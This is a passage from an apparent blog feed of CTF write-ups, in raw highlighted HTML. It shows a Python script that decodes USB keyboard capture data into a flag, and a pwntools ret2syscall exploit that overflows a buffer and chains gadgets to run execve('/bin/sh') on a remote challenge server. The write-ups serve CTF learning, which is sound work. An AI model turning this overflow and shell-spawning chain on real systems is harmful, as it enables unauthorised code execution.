class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> keys:<br> <span class="hljs-keyword">if</span> line[<span class="hljs-number">0</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">1</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">3</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">4</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">9</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">10</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">12</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">13</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">15</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">16</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">18</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">19</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">21</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">22</span>]!=<span class="hljs-string">'0'</span>:<br> <span class="hljs-keyword">continue</span><br> nums.append(<span class="hljs-built_in">int</span>(line[<span class="hljs-number">6</span>:<span class="hljs-number">8</span>],<span class="hljs-number">16</span>))<br>keys.close()<br>output = <span 
class="hljs-string">""</span><br><span class="hljs-keyword">for</span> n <span class="hljs-keyword">in</span> nums:<br> <span class="hljs-keyword">if</span> n == <span class="hljs-number">0</span> :<br> <span class="hljs-keyword">continue</span><br> <span class="hljs-keyword">if</span> n <span class="hljs-keyword">in</span> mappings:<br> output += mappings[n]<br> <span class="hljs-keyword">else</span>:<br> output += <span class="hljs-string">'[unknown]'</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">'output :\n'</span> + output)<br><br><span class="hljs-comment"># output :</span><br><span class="hljs-comment"># SEC2ETK3Y</span><br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><h2 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>, log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br><br><span class="hljs-comment"># p = process(&#x27;pwn&#x27;)</span><br>p = remote(<span class="hljs-string">&#x27;58.240.236.231&#x27;</span>,<span class="hljs-number">49003</span>)<br><br><br>rdi = <span class="hljs-number">0x40072b</span><br>rsi = <span class="hljs-number">0x400735</span><br>rax = <span class="hljs-number">0x400721</span><br>syscall = <span class="hljs-number">0x400741</span><br>rdx = <span class="hljs-number">0x40073f</span><br>binsh = <span class="hljs-number">0x601048</span><br>payload = <span class="hljs-number">0x48</span>*<span class="hljs-string">b&#x27;a&#x27;</span>+ p64(rax) + p64(<span class="hljs-number">59</span>) + p64(rdi) + p64(<span class="hljs-number">0x601048</span>) + p64(rsi) + p64(<span class="hljs-number">0</span>) + p64(syscall)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure></summary>
<category term="ctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/ctf/"/>
<category term="pwn" scheme="https://shenshuoyaoyouguangha.github.io/tags/pwn/"/>
<category term="write up" scheme="https://shenshuoyaoyouguangha.github.io/tags/write-up/"/>
</entry>
</feed>